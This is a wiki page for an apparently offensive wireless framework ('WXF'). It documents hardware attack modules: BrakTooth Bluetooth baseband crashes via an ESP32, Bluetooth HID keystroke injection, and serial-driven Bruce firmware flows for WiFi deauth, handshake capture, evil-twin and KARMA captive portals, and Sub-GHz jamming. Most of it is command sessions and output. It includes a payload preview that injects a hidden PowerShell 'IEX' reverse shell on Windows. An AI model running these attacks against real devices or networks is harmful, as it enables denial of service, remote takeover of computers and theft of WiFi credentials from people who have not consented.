-
Notifications
You must be signed in to change notification settings - Fork 2
Hardware
André Henrique edited this page Jun 8, 2026
·
1 revision
Hardware-specific attack modules requiring specialized physical devices: BrakTooth via ESP32, Bluetooth HID injection, and related hardware exploitation.
| Module | Description |
|---|---|
bluetooth/bt_baseband_attack |
BrakTooth / SweynTooth via ESP32 serial |
bluetooth/bt_hid_injection |
Bluetooth HID keyboard injection (Broadcom fallback) |
bluetooth/bt_hid_keyboard_inject |
Extended HID keyboard injection (BlueZ / Broadcom) |
external/bruce_serial_bridge |
ESP32 Bruce firmware serial flow engine |
BrakTooth is a family of Bluetooth Classic (BR/EDR) baseband vulnerabilities affecting over 1,400 products. They require specialized firmware for proof-of-concept, typically running on an ESP32 with Bluetooth HCI access.
| CVE | Chip | Impact | CVSS |
|---|---|---|---|
| CVE-2021-28135 | Espressif ESP32 | Crash on LMP AU_RAND | 7.5 |
| CVE-2021-28136 | Espressif ESP32 | Crash on LMP LMP_timing_accuracy_req | 7.5 |
| CVE-2021-28139 | Espressif ESP32 | OOB write via LMP_feature_req | 8.8 |
| CVE-2021-31609 | Intel AX200 | DoS via LMP_SRES overflow | 7.5 |
| CVE-2021-31612 | Qualcomm WCN3990 | Deadlock via LMP_detach | 7.5 |
| CVE-2021-34143 | Texas Instruments CC256x | DoS via SCO link setup | 7.5 |
wxf > use generic/bluetooth/bt_baseband_attack
wxf (BTBasebandAttack) > show options
Options:
TARGET_MAC (required) Target Bluetooth MAC address
ATTACK_TYPE braktooth Attack type (braktooth, sweyntooth)
CVE auto Specific CVE to test (auto = detect best match)
SERIAL_PORT /dev/ttyACM0 ESP32 serial port
SERIAL_BAUD 115200 Serial baud rate
SIMULATE true Dry-run without transmitting
wxf (BTBasebandAttack) > set TARGET_MAC AA:BB:CC:DD:EE:FF
wxf (BTBasebandAttack) > set ATTACK_TYPE braktooth
wxf (BTBasebandAttack) > set SERIAL_PORT /dev/ttyACM0
wxf (BTBasebandAttack) > set SIMULATE true
wxf (BTBasebandAttack) > run
[SIMULATE] BrakTooth attack setup
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] Serial: /dev/ttyACM0 @ 115200
[SIMULATE] Step 1: Probe target chip vendor via LMP features...
[SIMULATE] Expected: detect Espressif, Qualcomm, TI, Intel, or Broadcom
[SIMULATE] Step 2: Select CVE based on chip detection
[SIMULATE] Step 3: Transmit crafted LMP frame via ESP32
[SIMULATE] Without hardware: this module requires:
[SIMULATE] - ESP32 with BT HCI firmware (wrover or devkit)
[SIMULATE] - braktooth_esp32_bluetooth_classic_attack_poc firmware flashed
[SIMULATE] - Serial connection (/dev/ttyACM0 or /dev/ttyUSB0)
[!] Set SIMULATE=false and connect ESP32 to run
# Clone the BrakTooth PoC
git clone https://github.com/Matheus-Garbelini/esp32_bluetooth_classic_sniffer.git
cd esp32_bluetooth_classic_sniffer
# Install ESP-IDF (if not already installed)
# Flash firmware to ESP32
idf.py -p /dev/ttyACM0 flash
# Connect WXF via serial
wxf > use generic/bluetooth/bt_baseband_attack
wxf (BTBasebandAttack) > set SERIAL_PORT /dev/ttyACM0Bluetooth HID (Human Interface Device) injection allows an attacker to send keyboard input to a target device without PIN pairing, exploiting Bluetooth pairing vulnerabilities or using a pre-paired connection.
wxf > use generic/bluetooth/bt_hid_injection
wxf (BTHIDInjection) > show options
Options:
TARGET_MAC (required) Target device Bluetooth MAC
PAYLOAD (required) Keys to inject (raw or script file)
DELAY_MS 50 Inter-key delay in milliseconds
METHOD broadcom Injection method (broadcom, bluez, simulate)
SIMULATE true Dry-run without pairing
wxf (BTHIDInjection) > set TARGET_MAC AA:BB:CC:DD:EE:FF
wxf (BTHIDInjection) > set PAYLOAD "cmd\nwhoami\n"
wxf (BTHIDInjection) > set METHOD broadcom
wxf (BTHIDInjection) > set SIMULATE true
wxf (BTHIDInjection) > run
[SIMULATE] Bluetooth HID keyboard injection
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] Payload: 12 keystrokes
[SIMULATE] Step 1: Discover target HID profile (HID_SERVICE_CLASS)
[SIMULATE] Step 2: Initiate L2CAP HID connection (PSM 0x0011 control, 0x0013 interrupt)
[SIMULATE] Step 3: Send HID Keyboard Report for each character
[SIMULATE] Sequence: c-m-d-ENTER-w-h-o-a-m-i-ENTER
[SIMULATE] Keystroke sequence:
[SIMULATE] c: HID scancode 0x06
[SIMULATE] m: HID scancode 0x10
[SIMULATE] d: HID scancode 0x07
[SIMULATE] ENTER: HID scancode 0x28
[SIMULATE] ...
[!] Set SIMULATE=false + METHOD=broadcom to inject live
[!] PREREQ: Broadcom Bluetooth adapter with patch support OR already paired device
[!] NOTE: Requires target device to have BT discoverable/connectable
wxf (BTHIDInjection) > set PAYLOAD_FILE /payloads/windows_reverse_shell.btducky
wxf (BTHIDInjection) > run
[SIMULATE] Loading payload: /payloads/windows_reverse_shell.btducky
[SIMULATE] Lines: 25 commands | Estimated runtime: 4.5s at 50ms delay
[SIMULATE] Preview:
GUI R (Win+R)
DELAY 300
STRING powershell -w hidden -c "IEX..."
ENTER
...
WXF includes a full serial orchestration engine for BruceDevices/firmware.
wxf > use generic/external/bruce_serial_bridge
wxf (BruceSerialBridge) > set SERIAL_PORT /dev/ttyACM0
wxf (BruceSerialBridge) > set FLOW_PROFILE capture_handshake_flow
wxf (BruceSerialBridge) > run
[*] Connecting to Bruce firmware on /dev/ttyACM0...
[*] Firmware: Bruce v1.7.1 (ESP32-S3)
[*] Executing flow: capture_handshake_flow
[*] Step 1: WiFi scan...
[+] AP found: HomeWifi ch6 WPA2
[*] Step 2: Target: AA:BB:CC:DD:EE:FF
[*] Step 3: Deauth + capture...
[+] Handshake captured! Saved to /sdcard/handshake_AABBCCDDEEFF.pcap
[*] Flow complete.
| Flow Profile | Description |
|---|---|
baseline_status_flow |
Get device status and firmware info |
capture_handshake_flow |
WiFi scan + deauth + EAPOL capture |
wifi_menu_navigation_flow |
Interactive WiFi menu navigation |
deauth_clone_verify_flow |
Deauth + evil twin + capture verify |
sniffer_capture_flow |
Raw 802.11 promiscuous capture |
evil_portal_karma_flow |
KARMA + captive portal setup |
wifi_attack_lab_flow |
Multi-stage attack lab workflow |
raw_sniffer_probe_flow |
Probe request sniffer |
wifi_bruteforce_recon_flow |
WiFi recon + bruteforce prep |
navigation_recovery_flow |
Recover from menu error states |
captive_portal_endpoint_config_flow |
Configure captive portal endpoint |
repeater_wisp_setup_flow |
Setup WiFi repeater / WISP mode |
external_adapter_probe_flow |
External USB adapter probe |
webui_password_flow |
Web UI credential testing |
target_attack_stability_flow |
Stability test for long-running attacks |
ble_recon_spam_flow |
BLE recon + advertising spam |
ble_badble_recovery_flow |
BLE error recovery |
rf_spectrum_scan_flow |
Sub-GHz spectrum scan |
rf_jammer_stability_flow |
Sub-GHz jammer stability test |
wxf (BruceSerialBridge) > set FLOW_JSON [{"command":"wifi scan","expect":"#","wait_ms":1200},{"command":"nav back","repeat":2,"expect":"#"}]
wxf (BruceSerialBridge) > run
[*] Running custom flow: 2 steps
[*] Step 1: wifi scan -> OK (1,243ms)
[*] Step 2: nav back x2 -> OK
[*] Flow complete.
| Hardware | Interface | Modules | Notes |
|---|---|---|---|
| HackRF One | USB (hackrf_transfer) | Sub-GHz TX/RX, all subghz/* | Linux/macOS only |
| RTL-SDR | USB (rtl-sdr) | Sub-GHz RX (TPMS, OOK) | Receive only |
| CC1101 + ESP32 | SPI + USB serial | Sub-GHz static codes | Budget TX option |
| Flipper Zero | USB / microSD | Sub-GHz .sub replay | WXF generates .sub files |
| Bruce ESP32 | USB serial | WiFi/BLE attacks, RF scan | WXF orchestrates via serial |
| Alfa AWUS036ACM | USB (nl80211) | All WiFi modules | Best Linux monitor mode |
| Ubertooth One | USB | Bluetooth BR/EDR sniffing | BrakTooth/KNOB prereq |
| nRF52840 dongle | USB (Sniffle) | BLE sniffing | SweynTooth prereq |
| BlueZ HCI | USB Bluetooth | BLE GATT, HID, pairing | Standard Linux BT |
Related pages: Bluetooth & BLE | Sub-GHz Attacks | Configuration
Author: Andre Henrique (@mrhenrike) | Uniao Geek
Primeiros Passos
Ataques Wireless
Drones e UAV
Protocolos Especializados
Ferramentas de Pentest
Hardware